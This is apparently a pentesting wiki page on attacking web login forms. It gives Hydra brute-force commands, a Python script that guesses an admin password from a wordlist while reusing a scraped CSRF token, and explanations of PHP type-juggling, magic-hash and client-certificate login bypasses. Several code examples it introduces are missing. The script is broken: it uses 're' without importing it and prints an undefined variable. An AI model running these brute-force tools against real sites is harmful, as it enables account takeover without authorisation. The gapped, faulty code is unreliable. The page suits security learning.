Login Panes
We can find some login panes that we want to bypass or bruteforce. Here you can find some amazing tricks.
Bruteforce it!
Hydra
hydra is a powerful network service attack tool that attacks a variety of protocol authentication schemes, including SSH and HTTP.
POST Forms
hydra <ip-addr> -l user -P passwords.txt -s <port> -vV -f http-form-post "/index.php:user=^USER^&password=^PASS^:Invalid Credentials"
-l user
-L user wordlist
-p password
-P password wordlistBasic Auth
hydra <ip-addr> -l user -P passwords.txt -s <port> -vV -f http-get /index.phpMy own script
I made my own script in order to bruteforce some login panes with CSRF protection. I think is a good alternative to the Burpsuite Pitchfork attack.
#!/usr/bin/env python3
import sys, os, requests, codecs
s = requests.Session()
# Get CRSF TOKEN
resp = s.get("https://WEBPAGE.LOCAL/", verify=False)
regex = '<input type="hidden" name="csrf" value="(.*)"'
token = re.search(regex,resp.text).group(1)
with codecs.open("/usr/share/wordlists/rockyou.txt", 'r', encoding='utf-8', errors='ignore') as wordlist:
dic = wordlist.read().splitlines()
for pwd in dic:
#Bruteforce
data_post = {
"csrf" : token,
"username" : "admin",
"password" : pwd,
}
print("[!] Trying: " + pwd)
resp2 = s.post("https://WEBPAGE.LOCAL/login", json=data_post, verify=False)
if "permission_denied" not in resp2.text:
print("Username = " + username + "Password = " + pwd)
sys.exit(0) Bypass it!
The are very different methods to bypass a login pane, this are the most common ones.
SQLi
There are more info to bypass login panes with SQL Injections in:
SQL InjectionPHP Type Juggling (==)
How PHPβs type comparison features lead to vulnerabilities and in that case to bypass the login. Loose comparisons (==) have a set of operand conversion rules to make it easier for developers.
Let's check the differences between Strict comparisons (===) and Loose comparisons (==).
When we find some code like this:
Instead of send a string we send an array we will bypass the login:
Magic Hashes
This particular implication for password hashes wen the operator equals-equals(==) is used. The problem is in == comparison, the 0e means that if the following characters are all digits the whole string gets treated as a float. Below is a list of hash types that when hashed are ^0+ed*$ which equates to zero in PHP when magic hashes typing using the β==β operator is applied. That means that when a password hash starts with β0eβ¦β as an example it will always appear to match the below strings, regardless of what they actually are if all of the subsequent characters are digits from β0-9β.
Client Certificates
SSL/TLS certificates are commonly used for both encryption and identification of the parties, sometimes this is used instead of credentials at login.
Setting up the private key and the certificate (Server)
First of all, we need to generate our keys and certificates. We use the openssl command-line tool.
Setting up client certificates
To create a key and a Certificate Signing Request for Alice and Bob we can use the following command:
Server Signed Certificate:
Maybe during the pentest we found the server key, remember that we can download the server certificate with the browser.
Self-Signed Certificate:
Trying to get in
To use these certificates in our browser or via curl, we need to bundle them in PKCS#12 format.
Via Browser
Settings -> Privacy & Security -> Security -> Certificates -> View Certificates... -> Your Certificates -> Import
Via Curl
References:
Last updated
Was this helpful?